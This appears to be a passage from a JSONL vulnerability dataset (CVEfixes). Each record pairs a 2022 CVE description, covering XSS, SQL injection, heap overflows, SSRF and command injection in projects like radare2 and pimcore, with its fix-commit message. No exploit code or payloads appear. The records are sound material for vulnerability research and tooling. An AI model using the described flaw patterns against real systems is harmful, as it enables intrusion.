attacker could make the application perform arbitrary requests, bypass CVE-2022-1191'}]\n\nFix commit: fix #1752", "cve_id": "CVE-2022-1213", "source": "cvefixes", "timestamp": ""} {"id": "8a53c9d369885d69354e", "text": "CVE: CVE-2022-1219\n\n[{'lang': 'en', 'value': 'SQL injection in RecyclebinController.php in GitHub repository pimcore/pimcore prior to 10.3.5. This vulnerability is capable of steal the data'}]\n\nFix commit: [Recyclebin] Quote condition filter", "cve_id": "CVE-2022-1219", "source": "cvefixes", "timestamp": ""} {"id": "a7cf36763985c5eba3f7", "text": "CVE: CVE-2022-1222\n\n[{'lang': 'en', 'value': 'Inf loop in GitHub repository gpac/gpac prior to 2.1.0-DEV.'}]\n\nFix commit: fixed #2159", "cve_id": "CVE-2022-1222", "source": "cvefixes", "timestamp": ""} {"id": "99010601900ef3af47ba", "text": "CVE: CVE-2022-1231\n\n[{'lang': 'en', 'value': 'XSS via Embedded SVG in SVG Diagram Format in GitHub repository plantuml/plantuml prior to 1.2022.4. Stored XSS in the context of the diagram embedder. Depending on the actual context, this ranges from stealing secrets to account hijacking or even to code execution for example in desktop applications. Web based applications are the ones most affected. Since the SVG format allows clickable links in diagrams, it is commonly used in plugins for web base", "cve_id": "CVE-2022-1231", "source": "cvefixes", "timestamp": ""} {"id": "c6277e89f7c8efd1f424", "text": "CVE: CVE-2022-1233\n\n[{'lang': 'en', 'value': 'URL Confusion When Scheme Not Supplied in GitHub repository medialize/uri.js prior to 1.19.11.'}]\n\nFix commit: fix(parse): handle excessive slashes in scheme-relative URLs\n\nreported by @zeyu2001 via huntr.dev", "cve_id": "CVE-2022-1233", "source": "cvefixes", "timestamp": ""} {"id": "77db3edc3046e5dba87b", "text": "CVE: CVE-2022-1234\n\n[{'lang': 'en', 'value': 'XSS in livehelperchat in GitHub repository livehelperchat/livehelperchat prior to 3.97. This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.'}]\n\nFix commit: Add missing applicaiton/json header where missing", "cve_id": "CVE-2022-1234", "source": "cvefixes", "timestamp": ""} {"id": "1840b318ba4ce1dc99b0", "text": "CVE: CVE-2022-1235\n\n[{'lang': 'en', 'value': 'Weak secrethash can be brute-forced in GitHub repository livehelperchat/livehelperchat prior to 3.96.'}]\n\nFix commit: Increase size of secret hash and chagne it's algorithm", "cve_id": "CVE-2022-1235", "source": "cvefixes", "timestamp": ""} {"id": "3485e6b3d22d83b71c64", "text": "CVE: CVE-2022-1236\n\n[{'lang': 'en', 'value': 'Weak Password Requirements in GitHub repository weseek/growi prior to v5.0.0.'}]\n\nFix commit: Merge pull request #5630 from weseek/imprv/extend-minimum-password-length\n\nfix: Displaying minimum length of password", "cve_id": "CVE-2022-1236", "source": "cvefixes", "timestamp": ""} {"id": "608f54696381f0f63cbc", "text": "CVE: CVE-2022-1237\n\n[{'lang': 'en', 'value': 'Improper Validation of Array Index in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability is heap overflow and may be exploitable. For more general description of heap buffer overflow, see [CWE](https://cwe.mitre.org/data/definitions/122.html).'}]\n\nFix commit: Fix oobread segfaults in the NE bin parser ##crash\n\n* Reported by @han0nly via huntr.dev\n* Reproducers: seed1 seed2\n* BountyID: ad3c9c4c-76e7-40c8-bd4a-c095acd8bb40", "cve_id": "CVE-2022-1237", "source": "cvefixes", "timestamp": ""} {"id": "2292a7155145173bdf3d", "text": "CVE: CVE-2022-1238\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in libr/bin/format/ne/ne.c in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability is heap overflow and may be exploitable. For more general description of heap buffer overflow, see [CWE](https://cwe.mitre.org/data/definitions/122.html).'}]\n\nFix commit: Fix another oobread segfault in the NE bin parser ##crash\n\n* Reported by @han0nly via huntr.dev\n* Reproducers: sample1 sample2 sample3\n* BountyID: 47422cdf", "cve_id": "CVE-2022-1238", "source": "cvefixes", "timestamp": ""} {"id": "8f79cf7532b92a0df599", "text": "CVE: CVE-2022-1240\n\n[{'lang': 'en', 'value': 'Heap buffer overflow in libr/bin/format/mach0/mach0.c in GitHub repository radareorg/radare2 prior to 5.8.6. If address sanitizer is disabled during the compiling, the program should executes into the `r_str_ncpy` function. Therefore I think it is very likely to be exploitable. For more general description of heap buffer overflow, see [CWE](https://cwe.mitre.org/data/definitions/122.html).'}]\n\nFix commit: Fix oobread in the macho parser ##crash\n\n* Re", "cve_id": "CVE-2022-1240", "source": "cvefixes", "timestamp": ""} {"id": "a210612af25a3e1e0099", "text": "CVE: CVE-2022-1243\n\n[{'lang': 'en', 'value': 'CRHTLF can lead to invalid protocol extraction potentially leading to XSS in GitHub repository medialize/uri.js prior to 1.19.11.'}]\n\nFix commit: fix(parse): handle CR,LF,TAB\n\nreported by @haxatron via huntr.dev", "cve_id": "CVE-2022-1243", "source": "cvefixes", "timestamp": ""} {"id": "63476c475011e33a4f4e", "text": "CVE: CVE-2022-1244\n\n[{'lang': 'en', 'value': 'heap-buffer-overflow in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability is capable of inducing denial of service.'}]\n\nFix commit: Fix oobread in dyldcache ##crash\n\n* Reported by @hdthky via huntr.dev\n* Reproducers: poc1\n* BountyID: 8ae2c61a-2220-47a5-bfe8-fe6d41ab1f82", "cve_id": "CVE-2022-1244", "source": "cvefixes", "timestamp": ""} {"id": "61b117e46bb42eee706d", "text": "CVE: CVE-2022-1253\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository strukturag/libde265 prior to and including 1.0.8. The fix is established in commit 8e89fe0e175d2870c39486fdd09250b230ec10b8 but does not yet belong to an official release.'}]\n\nFix commit: error on out-of-range cpb_cnt_minus1 (oss-fuzz issue 27590)", "cve_id": "CVE-2022-1253", "source": "cvefixes", "timestamp": ""} {"id": "544d3407726d8196f18d", "text": "CVE: CVE-2022-1276\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in mrb_get_args in GitHub repository mruby/mruby prior to 3.2. Possible arbitrary code execution if being exploited.'}]\n\nFix commit: codegen.c: need to pack argument when `n==13` too.\n\nBecause we have extra 2 arguments coming (kw and rhs).", "cve_id": "CVE-2022-1276", "source": "cvefixes", "timestamp": ""} {"id": "ba5d54cb832e68d88dbf", "text": "CVE: CVE-2022-1283\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in r_bin_ne_get_entrypoints function in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability allows attackers to cause a denial of service (application crash).'}]\n\nFix commit: Fix null deref in the ne parser ##crash\n\n* Reported by @hmsec via huntr.dev\n* Reproducer: nepoc00\n* BountyID: bfeb8fb8-644d-4587-80d4-cb704c404013", "cve_id": "CVE-2022-1283", "source": "cvefixes", "timestamp": ""} {"id": "e6978f200908099cd9c0", "text": "CVE: CVE-2022-1284\n\n[{'lang': 'en', 'value': 'heap-use-after-free in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability is capable of inducing denial of service.'}]\n\nFix commit: Fix UAF in `aaef` ##crash\n\n* Reported by @hdthky\n* Reproducer: uaf-aef\n* BountyID: e98ad92c-3a64-48fb-84d4-d13afdbcbdd7", "cve_id": "CVE-2022-1284", "source": "cvefixes", "timestamp": ""} {"id": "be15271055530865119d", "text": "CVE: CVE-2022-1285\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository gogs/gogs prior to 0.12.8.'}]\n\nFix commit: webhook: revalidate local hostname before each delivery (#6988)", "cve_id": "CVE-2022-1285", "source": "cvefixes", "timestamp": ""} {"id": "5a784f925fa6e2e12389", "text": "CVE: CVE-2022-1286\n\n[{'lang': 'en', 'value': 'heap-buffer-overflow in mrb_vm_exec in mruby/mruby in GitHub repository mruby/mruby prior to 3.2. Possible arbitrary code execution if being exploited.'}]\n\nFix commit: class.c: clear method cache after `remove_method`.", "cve_id": "CVE-2022-1286", "source": "cvefixes", "timestamp": ""} {"id": "13ba88fd76e4d8c13bae", "text": "CVE: CVE-2022-1289\n\n[{'lang': 'en', 'value': 'A denial of service vulnerability was found in tildearrow Furnace. It has been classified as problematic. This is due to an incomplete fix of CVE-2022-1211. It is possible to initiate the attack remotely but it requires user interaction. The issue got fixed with the patch 0eb02422d5161767e9983bdaa5c429762d3477ce.'}]\n\nFix commit: fix possible pattern crash\n\nissue #325", "cve_id": "CVE-2022-1289", "source": "cvefixes", "timestamp": ""} {"id": "0e56f1662672674094be", "text": "CVE: CVE-2022-1290\n\n[{'lang': 'en', 'value': 'Stored XSS in \"Name\", \"Group Name\" & \"Title\" in GitHub repository polonel/trudesk prior to v1.2.0. This allows attackers to execute malicious scripts in the user\\'s browser and it can lead to session hijacking, sensitive data exposure, and worse.'}]\n\nFix commit: chore(security): fix issue where html was allowed in some input fields", "cve_id": "CVE-2022-1290", "source": "cvefixes", "timestamp": ""} {"id": "1a83428dcc24296fa66d", "text": "CVE: CVE-2022-1291\n\n[{'lang': 'en', 'value': 'XSS vulnerability with default `onCellHtmlData` function in GitHub repository hhurz/tableexport.jquery.plugin prior to 1.25.0. Transmitting cookies to third-party servers. Sending data from secure sessions to third-party servers'}]\n\nFix commit: Release 1.25", "cve_id": "CVE-2022-1291", "source": "cvefixes", "timestamp": ""} {"id": "64a100734b81b8d2809f", "text": "CVE: CVE-2022-1295\n\n[{'lang': 'en', 'value': 'Prototype Pollution in GitHub repository alvarotrigo/fullpage.js prior to 4.0.2.'}]\n\nFix commit: Merge pull request #4351 from alvarotrigo/dev\n\n- Fixed bug: jquery adaptor didnt work", "cve_id": "CVE-2022-1295", "source": "cvefixes", "timestamp": ""} {"id": "8e77093108c597902835", "text": "CVE: CVE-2022-1296\n\n[{'lang': 'en', 'value': 'Out-of-bounds read in `r_bin_ne_get_relocs` function in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability may allow attackers to read sensitive information or cause a crash.'}]\n\nFix commit: Fix oobread in NE parser ##crash\n\n* Reported by @hmsec via huntr.dev\n* Reproducer: necrash\n* BountyID: 52b57274-0e1a-4d61-ab29-1373b555fea0/", "cve_id": "CVE-2022-1296", "source": "cvefixes", "timestamp": ""} {"id": "1d5343cc587bf02d7f1b", "text": "CVE: CVE-2022-1297\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in r_bin_ne_get_entrypoints function in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability may allow attackers to read sensitive information or cause a crash.'}]\n\nFix commit: Fix oobread and unaligned casts in the NE entrypoint logic ##crash\n\n* Reported by @hmsec via huntr.dev\n* Reproducer: nepocaligns\n* BountyID: ec538fa4-06c6-4050-a141-f60153ddeaac", "cve_id": "CVE-2022-1297", "source": "cvefixes", "timestamp": ""} {"id": "7e862c78d2a3c19c7a2f", "text": "CVE: CVE-2022-1316\n\n[{'lang': 'en', 'value': 'ZeroTierOne for windows local privilege escalation because of incorrect directory privilege in GitHub repository zerotier/zerotierone prior to 1.8.8. Local Privilege Escalation'}]\n\nFix commit: 1.8.8 bump", "cve_id": "CVE-2022-1316", "source": "cvefixes", "timestamp": ""} {"id": "e35f967af309d4e9a4a1", "text": "CVE: CVE-2022-1330\n\n[{'lang': 'en', 'value': 'stored xss due to unsantized anchor url in GitHub repository alvarotrigo/fullpage.js prior to 4.0.4. stored xss .'}]\n\nFix commit: Merge pull request #4360 from ranjit-git/ranjit-git-patch-1\n\nRanjit git patch 1", "cve_id": "CVE-2022-1330", "source": "cvefixes", "timestamp": ""} {"id": "cfe210d3659cce5190b6", "text": "CVE: CVE-2022-1339\n\n[{'lang': 'en', 'value': 'SQL injection in ElementController.php in GitHub repository pimcore/pimcore prior to 10.3.5. This vulnerability is capable of steal the data'}]\n\nFix commit: Added Quote In Condition Filters", "cve_id": "CVE-2022-1339", "source": "cvefixes", "timestamp": ""} {"id": "539dbd80b0c3643a61cc", "text": "CVE: CVE-2022-1341\n\n[{'lang': 'en', 'value': 'An issue was discovered in in bwm-ng v0.6.2. An arbitrary null write exists in get_cmdln_options() function in src/options.c.'}]\n\nFix commit: Fix https://github.com/vgropp/bwm-ng/issues/26", "cve_id": "CVE-2022-1341", "source": "cvefixes", "timestamp": ""} {"id": "e5d3028e56a540749d7d", "text": "CVE: CVE-2022-1344\n\n[{'lang': 'en', 'value': \"Stored XSS due to no sanitization in the filename in GitHub repository causefx/organizr prior to 2.1.1810. This allows attackers to execute malicious scripts in the user's browser and it can lead to session hijacking, sensitive data exposure, and worse.\"}]\n\nFix commit: added sanitizeUserString and sanitizeEmail functions\nadded sanitize to uploaded image names\nadded sanitize to tabs, categories, users and bookmarks\nremoved svg files from approved imag", "cve_id": "CVE-2022-1344", "source": "cvefixes", "timestamp": ""} {"id": "89b832f065747cde17f6", "text": "CVE: CVE-2022-1345\n\n[{'lang': 'en', 'value': \"Stored XSS viva .svg file upload in GitHub repository causefx/organizr prior to 2.1.1810. This allows attackers to execute malicious scripts in the user's browser and it can lead to session hijacking, sensitive data exposure, and worse.\"}]\n\nFix commit: added sanitizeUserString and sanitizeEmail functions\nadded sanitize to uploaded image names\nadded sanitize to tabs, categories, users and bookmarks\nremoved svg files from approved image lists", "cve_id": "CVE-2022-1345", "source": "cvefixes", "timestamp": ""} {"id": "a9e93120522935c30a3c", "text": "CVE: CVE-2022-1346\n\n[{'lang': 'en', 'value': \"Multiple Stored XSS in GitHub repository causefx/organizr prior to 2.1.1810. This allows attackers to execute malicious scripts in the user's browser and it can lead to session hijacking, sensitive data exposure, and worse.\"}]\n\nFix commit: added sanitizeUserString and sanitizeEmail functions\nadded sanitize to uploaded image names\nadded sanitize to tabs, categories, users and bookmarks\nremoved svg files from approved image lists", "cve_id": "CVE-2022-1346", "source": "cvefixes", "timestamp": ""} {"id": "4f5e04405930cc41b2a3", "text": "CVE: CVE-2022-1347\n\n[{'lang': 'en', 'value': 'Stored XSS in the \"Username\" & \"Email\" input fields leads to account takeover of Admin & Co-admin users in GitHub repository causefx/organizr prior to 2.1.1810. Account takeover and privilege escalation'}]\n\nFix commit: added sanitizeUserString and sanitizeEmail functions\nadded sanitize to uploaded image names\nadded sanitize to tabs, categories, users and bookmarks\nremoved svg files from approved image lists", "cve_id": "CVE-2022-1347", "source": "cvefixes", "timestamp": ""} {"id": "bc2ba2fd67f3f4b78763", "text": "CVE: CVE-2022-1351\n\n[{'lang': 'en', 'value': 'Stored XSS in Tooltip in GitHub repository pimcore/pimcore prior to 10.4.'}]\n\nFix commit: [Security] ContentSecurityPolicyHandler - Add exclude paths property to disable csp for specific paths\n\nSigned-off-by: dpahuja ", "cve_id": "CVE-2022-1351", "source": "cvefixes", "timestamp": ""} {"id": "6e61ddd660b1196a0e65", "text": "CVE: CVE-2022-1353\n\n[{'lang': 'en', 'value': 'A vulnerability was found in the pfkey_register function in net/key/af_key.c in the Linux kernel. This flaw allows a local, unprivileged user to gain access to kernel memory, leading to a system crash or a leak of internal kernel information.'}]\n\nFix commit: af_key: add __GFP_ZERO flag for compose_sadb_supported in function pfkey_register\n\nAdd __GFP_ZERO flag for compose_sadb_supported in function pfkey_register\nto initialize the buffer of supp_skb t", "cve_id": "CVE-2022-1353", "source": "cvefixes", "timestamp": ""} {"id": "9820c7be59aa9a7cf5c7", "text": "CVE: CVE-2022-1365\n\n[{'lang': 'en', 'value': 'Exposure of Private Personal Information to an Unauthorized Actor in GitHub repository lquixada/cross-fetch prior to 3.1.5.'}]\n\nFix commit: chore: updated node-fetch version to 2.6.7 (#124)\n\n* chore: updated node-fetch version to 2.6.7\r\n\r\n* build: use node 16.x instead of 15.x", "cve_id": "CVE-2022-1365", "source": "cvefixes", "timestamp": ""} {"id": "d025c437e87ab3039ea6", "text": "CVE: CVE-2022-1379\n\n[{'lang': 'en', 'value': 'URL Restriction Bypass in GitHub repository plantuml/plantuml prior to V1.2022.5. An attacker can abuse this to bypass URL restrictions that are imposed by the different security profiles and achieve server side request forgery (SSRF). This allows accessing restricted internal resources/servers or sending requests to third party servers.'}]\n\nFix commit: Import version 1.2022.5", "cve_id": "CVE-2022-1379", "source": "cvefixes", "timestamp": ""} {"id": "50d1c28c7acbd7de7297", "text": "CVE: CVE-2022-1380\n\n[{'lang': 'en', 'value': 'Stored Cross Site Scripting vulnerability in Item name parameter in GitHub repository snipe/snipe-it prior to v5.4.3. The vulnerability is capable of stolen the user Cookie.'}]\n\nFix commit: Merge pull request #10942 from snipe/fixes/xss_user_requested\n\nFixes potential XSS vuln in user requestable results", "cve_id": "CVE-2022-1380", "source": "cvefixes", "timestamp": ""} {"id": "4a728b234c3951c3b3fc", "text": "CVE: CVE-2022-1381\n\n[{'lang': 'en', 'value': 'global heap buffer overflow in skip_range in GitHub repository vim/vim prior to 8.2.4763. This vulnerability is capable of crashing software, Bypass Protection Mechanism, Modify Memory, and possible remote execution'}]\n\nFix commit: patch 8.2.4763: using invalid pointer with \"V:\" in Ex mode\n\nProblem: Using invalid pointer with \"V:\" in Ex mode.\nSolution: Correctly handle the command being changed to \"+\".", "cve_id": "CVE-2022-1381", "source": "cvefixes", "timestamp": ""} {"id": "3efbabef005d954c3389", "text": "CVE: CVE-2022-1382\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository radareorg/radare2 prior to 5.6.8. This vulnerability is capable of making the radare2 crash, thus affecting the availability of the system.'}]\n\nFix commit: Fix null deref in ne parser ##crash\n\n* Reported by @cnitlrt via huntr.dev\n* BountyID: d8b6d239-6d7b-4783-b26b-5be848c01aa1/\n* Reproducer: nenull", "cve_id": "CVE-2022-1382", "source": "cvefixes", "timestamp": ""} {"id": "93389572e09271ff43f0", "text": "CVE: CVE-2022-1383\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository radareorg/radare2 prior to 5.6.8. The bug causes the program reads data past the end of the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.'}]\n\nFix commit: Fix oobread bug in NE parser ##crash\n\n* Reported by @cnitlrt via huntrdev\r\n* BountyID: 02b4b563-b946-4343-9092-38d1c5cd60c9\r\n* Reproducer: neoobread", "cve_id": "CVE-2022-1383", "source": "cvefixes", "timestamp": ""} {"id": "50f5d22df98a17fbadd9", "text": "CVE: CVE-2022-1411\n\n[{'lang': 'en', 'value': \"Unrestructed file upload in GitHub repository yetiforcecompany/yetiforcecrm prior to 6.4.0. Attacker can send malicious files to the victims is able to retrieve the stored data from the web application without that data being made safe to render in the browser and steals victim's cookie leads to account takeover.\"}]\n\nFix commit: Added validation to pasted files to the wysiwyg editor", "cve_id": "CVE-2022-1411", "source": "cvefixes", "timestamp": ""} {"id": "50226336dcc208f1062e", "text": "CVE: CVE-2022-1420\n\n[{'lang': 'en', 'value': 'Use of Out-of-range Pointer Offset in GitHub repository vim/vim prior to 8.2.4774.'}]\n\nFix commit: patch 8.2.4774: crash when using a number for lambda name\n\nProblem: Crash when using a number for lambda name.\nSolution: Check the type of the lambda reference.", "cve_id": "CVE-2022-1420", "source": "cvefixes", "timestamp": ""} {"id": "b006b00d3e2e0500e82e", "text": "CVE: CVE-2022-1427\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in mrb_obj_is_kind_of in in GitHub repository mruby/mruby prior to 3.2. # Impact: Possible arbitrary code execution if being exploited.'}]\n\nFix commit: vm.c: check if target_class is NULL (when prepended).", "cve_id": "CVE-2022-1427", "source": "cvefixes", "timestamp": ""} {"id": "ec371877fb728887f1d3", "text": "CVE: CVE-2022-1430\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - DOM in GitHub repository octoprint/octoprint prior to 1.8.0.'}]\n\nFix commit: 🔒️ Sanitize and validate login redirect\n\nFixes an XSS and an open redirect issue.", "cve_id": "CVE-2022-1430", "source": "cvefixes", "timestamp": ""} {"id": "b64f054e72374b1052b8", "text": "CVE: CVE-2022-1432\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Generic in GitHub repository octoprint/octoprint prior to 1.8.0.'}]\n\nFix commit: 🔒️ Fix XSS in webcam stream test", "cve_id": "CVE-2022-1432", "source": "cvefixes", "timestamp": ""} {"id": "e4b83ca55dbe71930642", "text": "CVE: CVE-2022-1437\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository radareorg/radare2 prior to 5.7.0. The bug causes the program reads data past the end of the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.'}]\n\nFix commit: Fix oobread and null deref in symbols file parser ##crash\n\n* Reported by @cnitlrt\n* BountyID: af6c3e9e-b7df-4d80-b48f-77fdd17b4038/\n* Reproducer: symoob", "cve_id": "CVE-2022-1437", "source": "cvefixes", "timestamp": ""} {"id": "7284c11f02ced09df650", "text": "CVE: CVE-2022-1439\n\n[{'lang': 'en', 'value': 'Reflected XSS on demo.microweber.org/demo/module/ in GitHub repository microweber/microweber prior to 1.2.15. Execute Arbitrary JavaScript as the attacked user. It\\'s the only payload I found working, you might need to press \"tab\" but there is probably a paylaod that runs without user interaction.'}]\n\nFix commit: update", "cve_id": "CVE-2022-1439", "source": "cvefixes", "timestamp": ""} {"id": "673e9e816d88a2678e53", "text": "CVE: CVE-2022-1440\n\n[{'lang': 'en', 'value': 'Command Injection vulnerability in git-interface@2.1.1 in GitHub repository yarkeev/git-interface prior to 2.1.2. If both are provided by user input, then the use of a `--upload-pack` command-line argument feature of git is also supported for `git clone`, which would then allow for any operating system command to be spawned by the attacker.'}]\n\nFix commit: fix potential vulnerability with git clone", "cve_id": "CVE-2022-1440", "source": "cvefixes", "timestamp": ""} {"id": "2f5b77a8f6e5f0c7dbf9", "text": "CVE: CVE-2022-1441\n\n[{'lang': 'en', 'value': 'MP4Box is a component of GPAC-2.0.0, which is a widely-used third-party package on RPM Fusion. When MP4Box tries to parse a MP4 file, it calls the function `diST_box_read()` to read from video. In this function, it allocates a buffer `str` with fixed length. However, content read from `bs` is controllable by user, so is the length, which causes a buffer overflow.'}]\n\nFix commit: fixed #2175", "cve_id": "CVE-2022-1441", "source": "cvefixes", "timestamp": ""} {"id": "42a2774f3de808950d5d", "text": "CVE: CVE-2022-1444\n\n[{'lang': 'en', 'value': 'heap-use-after-free in GitHub repository radareorg/radare2 prior to 5.7.0. This vulnerability is capable of inducing denial of service.'}]\n\nFix commit: Redo minor cleanup in new_rbtree", "cve_id": "CVE-2022-1444", "source": "cvefixes", "timestamp": ""} {"id": "b952c6dc1ebe14b93371", "text": "CVE: CVE-2022-1445\n\n[{'lang': 'en', 'value': 'Stored Cross Site Scripting vulnerability in the checked_out_to parameter in GitHub repository snipe/snipe-it prior to 5.4.3. The vulnerability is capable of stolen the user Cookie.'}]\n\nFix commit: Escape checkout target name\n\nSigned-off-by: snipe ", "cve_id": "CVE-2022-1445", "source": "cvefixes", "timestamp": ""} {"id": "94c2659a0b83649bafd6", "text": "CVE: CVE-2022-1451\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in r_bin_java_constant_value_attr_new function in GitHub repository radareorg/radare2 prior to 5.7.0. The bug causes the program reads data past the end 2f the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash. More details see [CWE-125: Out-of-bounds read](https://cwe.mitre.org/data/definitions/125.html).'}]\n\nFix commit: Fix oobread crash in java parser ", "cve_id": "CVE-2022-1451", "source": "cvefixes", "timestamp": ""} {"id": "052e65a91d9ebde8edac", "text": "CVE: CVE-2022-1452\n\n[{'lang': 'en', 'value': 'Out-of-bounds Read in r_bin_java_bootstrap_methods_attr_new function in GitHub repository radareorg/radare2 prior to 5.7.0. The bug causes the program reads data past the end 2f the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash. More details see [CWE-125: Out-of-bounds read](https://cwe.mitre.org/data/definitions/125.html).'}]\n\nFix commit: Fix oobread in java parser ##c", "cve_id": "CVE-2022-1452", "source": "cvefixes", "timestamp": ""} {"id": "9857fe54a2e8f76f0267", "text": "CVE: CVE-2022-1453\n\n[{'lang': 'en', 'value': 'The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to missing SQL escaping and parameterization on user supplied data passed to a SQL query in the rsvpmaker-util.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to and including 9.2.5.'}]\n\nFix commit: fixes for sql injection, card testing", "cve_id": "CVE-2022-1453", "source": "cvefixes", "timestamp": ""} {"id": "7e0c40c145c10954a191", "text": "CVE: CVE-2022-1457\n\n[{'lang': 'en', 'value': \"Store XSS in title parameter executing at EditUser Page & EditProducto page in GitHub repository neorazorx/facturascripts prior to 2022.04. Cross-site scripting attacks can have devastating consequences. Code injected into a vulnerable application can exfiltrate data or install malware on the user's machine. Attackers can masquerade as authorized users via session cookies, allowing them to perform any action allowed by the user account.\"}]\n\nFix commi", "cve_id": "CVE-2022-1457", "source": "cvefixes", "timestamp": ""} {"id": "defa3d87b4c637005d33", "text": "CVE: CVE-2022-1504\n\n[{'lang': 'en', 'value': 'XSS in /demo/module/?module=HERE in GitHub repository microweber/microweber prior to 1.2.15. Typical impact of XSS attacks.'}]\n\nFix commit: update", "cve_id": "CVE-2022-1504", "source": "cvefixes", "timestamp": ""} {"id": "c9a3fac0f6dd7306a476", "text": "CVE: CVE-2022-1509\n\n[{'lang': 'en', 'value': 'Sed Injection Vulnerability in GitHub repository hestiacp/hestiacp prior to 1.5.12. An authenticated remote attacker with low privileges can execute arbitrary code under root context.'}]\n\nFix commit: [Security] Patches multiple security issue (#2555)\n\n* Add missing check in is_format_valid\r\n\r\n* Add check on v-delete-dns-domain\r\n\r\n* Validate theme via is_format_valid\r\n\r\n* No need for extra code\r\n\r\n* Prevent LF command passed trough + Add test to veri", "cve_id": "CVE-2022-1509", "source": "cvefixes", "timestamp": ""} {"id": "8536bf78352de196dae5", "text": "CVE: CVE-2022-1511\n\n[{'lang': 'en', 'value': 'Improper Access Control in GitHub repository snipe/snipe-it prior to 5.4.4.'}]\n\nFix commit: Added access gate to the requested assets index\n\nSigned-off-by: snipe ", "cve_id": "CVE-2022-1511", "source": "cvefixes", "timestamp": ""} {"id": "7ef4e63f99872aa2c2ba", "text": "CVE: CVE-2022-1514\n\n[{'lang': 'en', 'value': \"Stored XSS via upload plugin functionality in zip format in GitHub repository neorazorx/facturascripts prior to 2022.06. Cross-site scripting attacks can have devastating consequences. Code injected into a vulnerable application can exfiltrate data or install malware on the user's machine. Attackers can masquerade as authorized users via session cookies, allowing them to perform any action allowed by the user account.\"}]\n\nFix commit: Sanitized the da", "cve_id": "CVE-2022-1514", "source": "cvefixes", "timestamp": ""} {"id": "019d1b4cb41a6559dc8c", "text": "CVE: CVE-2022-1530\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) in GitHub repository livehelperchat/livehelperchat prior to 3.99v. The attacker can execute malicious JavaScript on the application.'}]\n\nFix commit: 3.99v", "cve_id": "CVE-2022-1530", "source": "cvefixes", "timestamp": ""} {"id": "2f9355492d09fd7fd2a6", "text": "CVE: CVE-2022-1531\n\n[{'lang': 'en', 'value': 'SQL injection vulnerability in ARAX-UI Synonym Lookup functionality in GitHub repository rtxteam/rtx prior to checkpoint_2022-04-20 . This vulnerability is critical as it can lead to remote code execution and thus complete server takeover.'}]\n\nFix commit: avoid SQL injection exploits", "cve_id": "CVE-2022-1531", "source": "cvefixes", "timestamp": ""} {"id": "d9cf09e8d65719a26cba", "text": "CVE: CVE-2022-1533\n\n[{'lang': 'en', 'value': 'Buffer Over-read in GitHub repository bfabiszewski/libmobi prior to 0.11. This vulnerability is capable of arbitrary code execution.'}]\n\nFix commit: Fix wrong boundary checks in inflections parser resulting in stack buffer over-read with corrupt input", "cve_id": "CVE-2022-1533", "source": "cvefixes", "timestamp": ""} {"id": "cb50ab881d7456c026d4", "text": "CVE: CVE-2022-1534\n\n[{'lang': 'en', 'value': 'Buffer Over-read at parse_rawml.c:1416 in GitHub repository bfabiszewski/libmobi prior to 0.11. The bug causes the program reads data past the end of the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.'}]\n\nFix commit: Fix array boundary check when parsing inflections which could result in buffer over-read with corrupt input", "cve_id": "CVE-2022-1534", "source": "cvefixes", "timestamp": ""} {"id": "2a1878ddca09607fa9aa", "text": "CVE: CVE-2022-1537\n\n[{'lang': 'en', 'value': \"file.copy operations in GruntJS are vulnerable to a TOCTOU race condition leading to arbitrary file write in GitHub repository gruntjs/grunt prior to 1.5.3. This vulnerability is capable of arbitrary file writes which can lead to local privilege escalation to the GruntJS user if a lower-privileged user has write access to both source and destination directories as the lower-privileged user can create a symlink to the GruntJS user's .bashrc file or re", "cve_id": "CVE-2022-1537", "source": "cvefixes", "timestamp": ""} {"id": "413daf3682023dc113e0", "text": "CVE: CVE-2022-1543\n\n[{'lang': 'en', 'value': 'Improper handling of Length parameter in GitHub repository erudika/scoold prior to 1.49.4. When the text size is large enough the service results in a momentary outage in a production environment. That can lead to memory corruption on the server.'}]\n\nFix commit: fixed profile name not limited in length", "cve_id": "CVE-2022-1543", "source": "cvefixes", "timestamp": ""} {"id": "a3fd00cd89e640360dd1", "text": "CVE: CVE-2022-1544\n\n[{'lang': 'en', 'value': 'Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in GitHub repository luyadev/yii-helpers prior to 1.2.1. Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data.'}]\n\nFix commit: Merge pull request #7 from luyadev/csv-sanitizer\n\nCsv sanitizer", "cve_id": "CVE-2022-1544", "source": "cvefixes", "timestamp": ""} {"id": "0901dc0853491ab78033", "text": "CVE: CVE-2022-1553\n\n[{'lang': 'en', 'value': 'Leaking password protected articles content due to improper access control in GitHub repository publify/publify prior to 9.2.8. Attackers can leverage this vulnerability to view the contents of any password-protected article present on the publify website, compromising confidentiality and integrity of 